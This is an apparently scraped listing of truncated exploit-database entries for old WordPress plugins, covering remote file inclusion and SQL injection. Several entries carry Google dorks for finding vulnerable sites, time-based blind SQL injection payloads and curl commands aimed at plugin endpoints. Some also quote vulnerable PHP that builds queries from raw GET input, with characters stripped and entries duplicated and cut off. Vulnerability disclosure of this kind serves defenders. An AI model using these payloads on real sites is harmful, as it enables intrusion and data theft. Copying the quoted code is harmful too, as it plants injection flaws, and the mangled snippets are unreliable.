Wordpress Mailing List Plugin 1.3.2 Remote File Inclusion

Exploit for php platform in category web applications Exploit Title: Mailing List Wordpress plugin RFI Google Dork: inurl:wp-content/plugins/mailz Date: 09/19/2011 Author: Ben Schmidt supernothing AT spareclockcycles.org @supernothing Software Link:...

Wordpress Annonces Plugin 1.2.0.0 Remote File Inclusion

Exploit for php platform in category web applications Exploit Title: Annonces Wordpress plugin RFI Google Dork: inurl:wp-content/plugins/annonces Date: 09/19/2011 Author: Ben Schmidt supernothing AT spareclockcycles.org @supernothing Software Link:...

Wordpress TheCartPress Plugin 1.1.1 Remote File Inclusion

Exploit for php platform in category web applications Exploit Title: Thecartpress Wordpress plugin RFI Google Dork: inurl:wp-content/plugins/thecartpress Date: 09/19/2011 Author: Ben Schmidt supernothing AT spareclockcycles.org @supernothing Software Link:...

WordPress Auctions 1.8.8 SQL Injection

Exploit Title: WordPress Auctions plugin @AlligatorTeam Software Link: http://downloads.wordpress.org/plugin/wp-auctions.zip Version: 1.8.8 tested --------------- PoC --------------- URL:...

WordPress Plugin Tune Library 2.17 - SQL Injection

WordPress Plugin Tune Library 2.17 - SQL Injection Exploit Title: WordPress Tune Library plugin prefix . "tracks where artist != '' and artist like '" .$artistletter . "%' order by artist";...

WordPress Plugin Tune Library 2.17 - SQL Injection

Exploit Title: WordPress Tune Library plugin prefix . "tracks where artist != '' and artist like '" .$artistletter . "%' order by artist";...

WordPress Plugin A to Z Category Listing 1.3 - SQL Injection

Exploit Title: WordPress A to Z Category Listing plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 --------------- Vulnerable code --------------- $initletter = $GET'R'; $sql = "select from ".$tableprefix."terms wpt,".$tableprefix."termtaxonomy wptt where wpt.name like...

WordPress Paid Downloads 2.01 SQL Injection

Exploit Title: WordPress Paid Downloads plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 --------------- Vulnerable code --------------- $downloadkey = $GET"downloadkey"; $sql = "SELECT FROM ".$wpdb-prefix."pddownloadlinks WHERE downloadkey = '".$downloadkey."'"; $linkdetails =...

WordPress Plugin Paid Downloads 2.01 - SQL Injection

Exploit Title: WordPress Paid Downloads plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 --------------- Vulnerable code --------------- $downloadkey = $GET"downloadkey"; $sql = "SELECT FROM ".$wpdb-prefix."pddownloadlinks WHERE downloadkey = '".$downloadkey."'"; $linkdetails =...

WordPress Community Events 1.2.1 SQL Injection

Exploit Title: WordPress Community Events plugin getblogprefix . "ceevents where eventid = " . $eventid;...

WordPress WP Forum Server 1.7 SQL Injection

Exploit Title: WordPress WP Forum Server plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20&editpostsubject=test&message=dummy&threadid=1 e.g. curl --data "editpostsubmit=1&editpostid=-1 AND...

WordPress SCORM Cloud 1.0.6.6 SQL Injection

Exploit Title: WordPress SCORM Cloud plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 e.g.: curl --data "action=addAnonRegGetLaunchUrl&inviteid=-1' AND 1=IF21,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0-- " http://www.site.com/wp-content/plugins/scormcloud/ajax.php...

WordPress Plugin post highlights 2.2 - SQL Injection

WordPress Plugin post highlights 2.2 - SQL Injection Exploit Title: WordPress post highlights plugin posts WHERE posttype='attachment' AND postparent='$id'";...

WordPress Tweet Old Post 3.2.5 SQL Injection

Exploit Title: WordPress Tweet Old Post plugin Software Link: http://downloads.wordpress.org/plugin/tweet-old-post.zip Version: 3.2.5 tested --------------- PoC POST data --------------- URL: http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts POST Data:...

WordPress Post Highlights 2.2 SQL Injection

Exploit Title: WordPress post highlights plugin posts WHERE posttype='attachment' AND postparent='$id'";...

WordPress Zotpress 4.4 SQL Injection

Exploit Title: WordPress Zotpress plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0%23 --------------- Vulnerable code --------------- if $mzrapiuserid == false && $mzrinclude == false && isset$GET'apiuserid' && pregmatch"/^0-9+$/", $GET'apiuserid' $mzrapiuserid = trim$GET'apiuserid';...

WordPress Plugin Facebook Opengraph Meta 1.0 - SQL Injection

Exploit Title: WordPress Facebook Opengraph Meta Plugin plugin getvar"SELECT COUNT AS count FROM $wpdb-postmeta WHERE metakey = 'OgMeta'"; $count = $result'count'; if $count 0 $totalpages = ceil$count/$limit; else $totalpages = 0; if $page $totalpages $page=$totalpages; $start = $limit$page -...

WordPress VideoWhisper Video Presentation 1.1 SQL Injection

Exploit Title: WordPress VideoWhisper Video Presentation plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 e.g.: curl --data "s=-1' AND 1=IF21,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0-- " http://www.site.com/wp-content/plugins/videowhisper-video-presentation/vp/cstatus.php...

WordPress Plugin VideoWhisper Video Presentation 1.1 - SQL Injection

Exploit Title: WordPress VideoWhisper Video Presentation plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 e.g.: curl --data "s=-1' AND 1=IF21,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0-- " http://www.site.com/wp-content/plugins/videowhisper-video-presentation/vp/cstatus.php...

WordPress SearchAutocomplete plugin <= 1.0.8 SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title: WordPress SearchAutocomplete plugin getresults"SELECT posttitle As name, ID as postid, guid AS url, 1 cnt FROM ".$wpdb-prefix."posts t WHERE poststatus='publish' and posttype='post' OR posttype='page' and postdate NOW and...